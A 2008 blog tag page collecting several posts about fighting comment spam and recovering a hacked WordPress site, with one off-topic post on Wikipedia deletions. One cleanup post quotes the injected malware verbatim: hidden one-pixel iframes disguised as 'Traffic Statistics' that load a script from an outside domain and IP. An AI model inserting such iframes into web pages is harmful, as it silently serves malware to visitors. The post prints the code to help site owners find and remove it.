Posts Tagged ‘spam’

How to keep spam off your blog, bulletin board, or forum

Thursday, July 17th, 2008

Columns of gears in the difference engine Spam, it’s not just for breakfast and email anymore.  Webspam is a huge problem - if you run a blog or a forum, you’re probably familiar with the gobs and gobs of gibberish being posted all over the web by spammers.

This humble blog, which only gets a few hundred visitors per day, has had over 17,000 spam comments since I moved over to Wordpress last year.  Having your site inundated with comment spam can be just as big a headache as getting hacked.  No one wants to spend hours every day sorting the good posts from the bad.  I’ve already written about how to totally clear out a spammed forum and erase all traces of it’s reputation-marring existence, but the best solution is prevention.

Here are some steps you can take to help prevent spam on your blog or forum.

Keeping Spam off Your Blog

This section assumes you’re hosting your own blog and can add plugins and make configurartion changes, and my examples will be WordPress-heavy because I’m more familiar with WordPress.

Option 1:  Close or restrict comments. Most blogs give you some options to restrict who can comment on articles.  In Wordpress, you can require that users create accounts to comment under Settings -> General.  This might not help too much since I’ve seen hundreds of automated user accounts created right alongside the spam.

You can also require that comments are approved before they appear - in Wordpress look under Settings -> Discussion.  This will stop your blog from being graffitied without your knowledge but also requires manual effort.  You can also disallow trackbacks and pingbacks, which are really cool in theory but a major avenue for automated spam.

You can also shut down comments completely, or disable comments on old posts.  At that point you may be throwing the baby out with the bathwater, but it’s certainly effective.

Option 2:  Make sure commenters are real people with a captcha. Even if you’re not familiar with the term, you’re familiar with captchas.  They’re the little widgets at the end of a form where you have to decipher some scrambled text from an image.  Many blogs have captcha options built in, but if you’re looking for a captcha plugin be sure to balance usability with security.

I’ve used the Did You Pass Math plugin with some success.  Jeff Atwood has used an extremely simple captcha for years on his high-traffic blog.  Recaptcha is a really cool project that helps fight automatic posting and digitize old books at the same time.

Option 3:  Use an automatic filtering system. If you’re using Wordpress, I have three words for you:  Akismet, Akismet, Akismet! Seriously, Akismet is so good at automatically marking spammy commetns and trackbacks that it’s almost scary.  If you’re not using WordPress, you may still be able to find an Akismet plugin for your blogging platform.  There are other systems worth trying as well such as Spam Karma but I have less experience with those.

Keeping Spam off Your Forum

Again, I’m assuming you are hosting the forum yourself or can otherwise make config changes.  I’ll use phpBB (version 3) as an example because I’ve used it in the past.

Option 1:  Restrict user accounts. This can be a tough call, because when you start a forum you want to make it as easy as possible for people to join in the discussion.  Unfortunately, allowing anyone to register and begin posting without any admin approval also opens the door for spammers.

In phpBB this setting can be found in the Administration Control Panel under Board Configuration -> User Registration Settings.

Option 2:  Again with the captchas. Captchas aren’t 100 percent garanteed to remove spam but they do help.  If your forum software doesn’t have a captcha or a captcha plugin, I would seriously consider upgrading to a version that does or switching forums completely.  I know it’s a huge pain but waking up one morning to find 10,000 spam posts is even worse.

In phpBB3 look under Board Configuration -> User Registration Settings for a setting called “Enable visual confirmation for registrations” and make sure it’s turned on.  You can change the details under Board Configuration -> Visual confirmation settings.

Option 3:  Try to find an automatic filtering system. This is harder than for blogs.  There was an Akismet phpBB mod but it’s apparently not being maintained.  There’s a workaround involving the Spam Words mod that you can read about here.  The Spam Words mod might be worth trying on it’s own too.  Here’s a thread with more options for phpBB2, search around and find what’s available for your forum software.

Even without automated filtering, you can try to slow down the spammers by setting a time limit between posts (most human beings don’t type as quickly as spambots do).  Other options, such as disallowing links and BBCode, are pretty drastic but might make your blog less enticing.

Just for fun:

Spam, spam, bacon, and Spam

Sphere: Related Content

The Urge to Deletion: Is Wikipedia is making molehills out of mountains?

Tuesday, June 17th, 2008

Black Mountain Wikipedia is great.  Even now, it’s still kind of amazing that such a huge body of knowledge has been organized ad-hoc by volunteers, most of whom have never met in person. Most social software systems would die for this level of collaboration.

That said, has anyone else gone to a random Wikipedia article from, say, search results and ended up a little depressed?  It seems like every other article I find lately has a big warning label at the top - this article contains too much trivia, this article has too many fictional references for an encyclopedic and academic approach of this topic, and worst one of all: this article has been marked for deletion.

I understand that it must be very difficult to wrangle all the millions of contributions into a consistently high-quality encyclopedia.  Just dealing with all the spam and abuse must be an enormous undertaking, even when distributed among thousands of good samaritans.  But one of the things that was great about Wikipedia was the breadth of coverage and the depth on some particulars, even if it was excessive to the point of comedy.

But a brief look at the list of articles marked for deletion the last few days illustrates my point.

1. Horse Ranch Mountain. You know there’s something wrong when a mountain doesn’t meet the notability requirement.   Here’s the comment opening the deletion on the talk page:

In what way is Horse Ranch Mountain notable? I am quite familiar with the area, and I cannot think of any way in which it is notable. Please convince me otherwise.

I would think it’s notable because it is a mass of millions of tons of rock and earth sticking out of the ground.  One a less sarcastic note, I’m sure I’m not the only one who’s looked at a map, spotted a feature I’ve never heard of, then looked it up online.  Even if it’s not accessible it’s probably helpful to have a reference noting that it’s the highest point in Zion, measured at X meters tall, etc.

2.  List of redundant expressions. I understand the argument that an encyclopedia is not a trivia game or a book of lists, but these sorts of pages used to be one of my favorite features of Wikipedia.  Exhaustive lists of palindromes, English words of Polish origin, etc., give examples, context, and can help connect concepts in language.  Also, the use or omission of redundancy is an important stylistic consideration when writing - it can be used for everything from emphasis to characterization.

3.  Hindu literature. Delete the article on Hindu literature?  Granted, the article needs work.  But isn’t it worrying how the marked for deletion pages are filled with subject matter from outside the U.S. and maybe Europe?

I know the standard answer to complaints like these is that if you feel so strongly, you should participate in the debates and push for things not to be deleted.  Judging by the talk pages I wonder if I would be drowned out by all the “I’m a history major and this is a programming term, never heard of it, not notable” comments.  I’ll admit my contribution to Wikipedia is limited to random spelling and grammar corrections that were obvious enough that even I noticed them, so I could be wrong.  I just feel like some of what made Wikipedia so addictive is slowly being drained away.

Agree?  Think I’m wrong?  Leave me a comment below.  See, it’s kind of like a talk page, but even with consensus you can’t edit my article.   Until the next Wordpress exploit comes out.

Sphere: Related Content

Fixing a ‘This site may harm your computer’ warning, part 3: Clearing a spammed forum

Saturday, March 22nd, 2008

Sun setting behind a sculpture in the park near Google Earlier I wrote about the steps you should take if your site has been hacked and is being slapped with a “This site may harm your computer” label. In that post we covered some of the sneaky ways scammers will insert text into your posts on Wordpress and other blog software.

But what if it’s even worse? Let’s say you installed a forum like phpBB to play around with but haven’t been keeping up with security updates. Or, even worse, your ftp account has been compromised and spammers have installed their own bulletin board or other content in a subfolder or subdomain. You don’t want Google and Yahoo thinking you are a spammer, so what do you do?

In that worst-case scenario, you’ll first need to change your passwords and make sure you have control of any and all ftp accounts, telnet accounts, etc. You may need to work with your host to make sure everything is locked down. Web server security is a big topic in it’s own right so from here on out we’ll assume you’ve already got that covered.

Step 1 - Delete the spam!

The first thing to do is delete the spammy bulletin board. Go ahead and delete all the contents of the directory. Don’t delete the directory itself quite yet. This does two things - it stops the spammers from getting any benefit from wayward visitors to your site and it causes your web server to start serving 404s (not found) to search engine spiders.

You can go one step further and explicitly tell browsers and spiders that this stuff is gone forever- by serving a 410 (gone). You can do this with any server-side language, my example will be in PHP. Create a new index.php file in your formerly-spammed directory that looks like this:

<?php header("HTTP/1.1 410 Gone");
header("Status: 410 Gone");?>

This will cover the main directory and then you can use mod_rewrite to redirect all the deleted pages to your 410 file.

Step 2 - Update your robots.txt

At this point search engine spiders will be able to figure out that the pages should be removed from their indexes, but only one page at a time as they re-crawl your site. You want it out of there ASAP, so create a robots.txt entry to tell spiders to stay away from the whole directory. It should look something like this:

User-agent: *
Disallow: /forum/

If the spam was in a subdomain, you’ll need to make sure you have a robots.txt file in the root directory of the subdomain that disallows the whole thing:

User-agent: *
Disallow: /

Step 3 - Tell Google about the spam

Log in to Google Webmaster Tools and look under Tools -> Remove URLs.  Create a new removal request for the subdirectory or subdomain you’ve cleaned.  This might seem a little redundant, since you’ve already done two steps that will let search engines know you’re no longer serving up spam.  But it’s worth being as explicit as possible to get your site’s reputation cleared as quickly as possible.

Bonus tip:  Subdomains and Google Webmaster Tools

If your spammed forum was in a subdomain, let’s say http://forum.exmaple.com, you’ll need to add the subdomain as a new site in Google Webmaster Tools.  You’ll need to go through the site verification process for the subdomain, too - it won’t verify automtically like if you had added a subdirectory as a new site.

By the way, if you’d like some more tips about keeping your site clean and tidy, check out this great post on the Google Webmaster Central Blog.

Any questions? Comments?  Tips that I’ve missed?  Please post in the comments section below.

Sphere: Related Content

Fixing a ‘This site may harm your computer’ warning, part 2: Hidden iFrames

Thursday, March 6th, 2008

Earlier I wrote about what I did when my Wordpress blog started returning a “This site may harm your computer” warning in Google and Firefox. Just to recap, these are the first steps to take to fix the problem:

  1. Plug the hole - update Wordpress (or your blog, forum, or CMS software) to plug any security holes.
  2. Repair the damage - search for spammy outgoing links or malware files on your pages and delete them.
  3. Clear your good name - request a review by StopBadware.org and in Google Webmaster Tools.

This is the right process to follow, but it turns out that I was a bit premature in doing step 3. Spammers and spyware spreaders are a wily, unpredictable bunch and they can’t be expected to stick to simple tactics like inserting links into posts.

The other tactic they used on my site was inserting invisible iFrames. These are harder to find because there aren’t as many automated tools to find them (or, at least, I don’t know of any) so it takes some manual searching through your source code. Here’s what the malware code looked like:


<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

<noscript></noscript> <iframe src=”http://61.132.75.71/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe><br />
<!– End Traffic Statistics –>

It looks like others have run into the same issue. Your anti-virus software may even give you a warning about a virus in a file named “wp-stats[1].htm.” In my case AVG Antvirus warned me about a trojan horse in my temp folder.

Once I removed the iframes, I resubmitted my request in Google Webmaster Tools. Here’s another helpful hint that took me a while to figure out: If only part of your site has been hacked and is marked in StopBadware.org’s database, you should Add that subdirectory as a new site in Webmaster Tools. Here’s an illustration (click to see full size):

webmaster-tools-subdir

In this screenshot you can see my main site, www.jasonmorrison.net. If I click there I don’t see any warning about spam or viruses in my blog at www.jasonmorrison.net/content. So I just added my blog as a new “site” and there I could see the warnings and make a reconsideration request.

One last thing: Google may send out an email to try to let you know about these sorts of problems. I never saw these emails, though, since they go to addresses like abuse@yourdomain.com and admin@yourdomain.comthat spammers also like to use. They ended up in my spam bucket. So you might want to whitelist email from google.com.

Next in part three I’ll talk about what to do when a whole subdomain (perhaps with a forum) is filled with spam. Please put questions or additional suggestions in the comments below.

Sphere: Related Content

What I did when my site showed up as a bad link

Wednesday, February 27th, 2008

This site is just a humble blog where I write a bit about programming, design, usability, and other topics I’m interested in. It’s nice that I get some readership and few few good comments now and again but I don’t have any real financial stake here, and I’m definitely not interested in trying to spam anyone, send them spyware, etc. So imagine my shock when I noticed that my blog comes up with a warning, “This site may harm your computer.”

This comes up in various places including Firefox 3 and Google searches.  Obviously no one is going to follow a link to my site with such a disclaimer. So where did it come from and what did I do to clear my sites good name?

The disclaimer comes from the findings of StopBadware.org, an effort that I had heard about in the past but hadn’t really looked into. It sounds like a great idea - it’s very difficult for users to investigate every single link they might click on, and some spyware and adware is hard to see before it’s too late. So Stopbadware.org is a sort of neighborhood watch for the web.

How did my site end up on the list? There are a number of possibilities, so the first step is to check StopBadware.org to see what they found. Follow this link to search for your URL. Make sure you search for your root domain, in my case jasonmorrison.net. Some subdomains or directories might show up with a report while others are still considered clean. This confused me for a while.

Once you see the details there it’s time to hunt for problems. If you have anything more than a simple, static site this can be more difficult than it might first seem. My site uses Wordpress and allows user comments. A bad link to show up in a comment, or someone may have hacked the site using a known vulnerability. It looks like it was the latter in my case, but I’m getting ahead of myself. How do you find the bad link?

There are lots of tools to find incoming links to your site, but I’ve only found one so far that checks outgoing links, at Bad Neighborhood. Don’t blindly rely on this tool, but follow up on any links that you don’t recognize having put there yourself. I found a link in the middle of a post from a month or so ago to some spammy German site.

How did the link get there? I don’t think my site was hacked wholesale (or if it was, they were very subtle about it). More likely someone took advantage of my laziness as upgrading Wordpress and used a known security exploit.

Now that we’ve found and removed the offending link and plugged any known security holes, it’s time to try to get the stigma removed. Follow the link to the StopBadware.org request for review page and fill out a request. If the badware report came from one of their partners, you may have to follow up with them as well. I’m still waiting to here back on my review, I’ll post an update when I know more.

Hopefully this has been helpful. Let me know if you have any questions or suggestions in the comments below.

Sphere: Related Content